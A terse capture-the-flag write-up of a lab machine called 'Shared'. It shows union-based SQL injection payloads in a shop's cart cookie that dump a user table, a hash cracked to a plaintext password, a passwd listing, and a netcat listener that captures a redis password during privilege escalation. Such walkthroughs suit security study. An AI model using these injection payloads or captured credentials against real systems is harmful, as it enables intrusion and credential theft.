Shared
Shared
{image of site}
nmap
Foothold
PrestaShop
Messing with the cart cookie on checkout.shared.htb shows that we can adjust the cart purely from the cookie. Maybe it's injectable?
Verified that we can obscure this cookie as well
We verified that we have a union injection sql injection
Let's try to exploit that to see the database
{"562XZDU8' and 0=1 union select '1',database(),'3'-- -":"1"}
Now let's see the tables
{"562XZDU8' and 0=1 union select '1',table_name,'3' from information_schema.tables where table_schema='checkout'-- -":"1"}
Let's see the columns
{"562XZDU8' and 0=1 union select '1',column_name,'3' from information_schema.columns where table_name = 'checkout'-- -":"1"}
Thomas
{"53GG2EF8' and 0=1 union select 'A',group_concat(column_name separator '|') ,'c' from information_schema.columns where table_name = 'user'-- -":"1"}
Which doesn't work lets try a few basics for user checkout
{"562XZDU8' and 0=1 union select '1',username,'3' from checkout.user-- -":"1"}
james_mason
{"562XZDU8' and 0=1 union select '1',password,'3' from checkout.user-- -":"1"}
fc895d4eddc2fc12f995e18c865cf273
Send that to crackstation
Soleil101
Now we're in the box
We see that we have another user dan_smith
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
james_mason:x:1000:1000:james_mason,,,:/home/james_mason:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
dan_smith:x:1001:1002::/home/dan_smith:/bin/bash
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
Groups:
We identify the DB as mariadb
Ports open on the machine
we find a blank directory for developers
lets see if we can get an SUID file to execute in there
Root Escalation
Found access to /usr/local/bin/redis_connector_dev through linpeas
ran it on the box
dan_smith@shared:~$ ./redis_connector_dev
[+] Logging to redis instance using password...
INFO command result:
# Server
redis_version:6.0.15
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:4610f4c3acf7fb25
redis_mode:standalone
os:Linux 5.10.0-16-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:126902
run_id:e27d809758a3bf29b180cc83099973308f720da1
tcp_port:6379
uptime_in_seconds:52
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:3135455
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
io_threads_active:0
<nil>
then ran it locally
nc -lvnp 6379
listening on [any] 6379 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 44892
*2
$4
auth
$16
F2WHqJUz2WEz=Gqq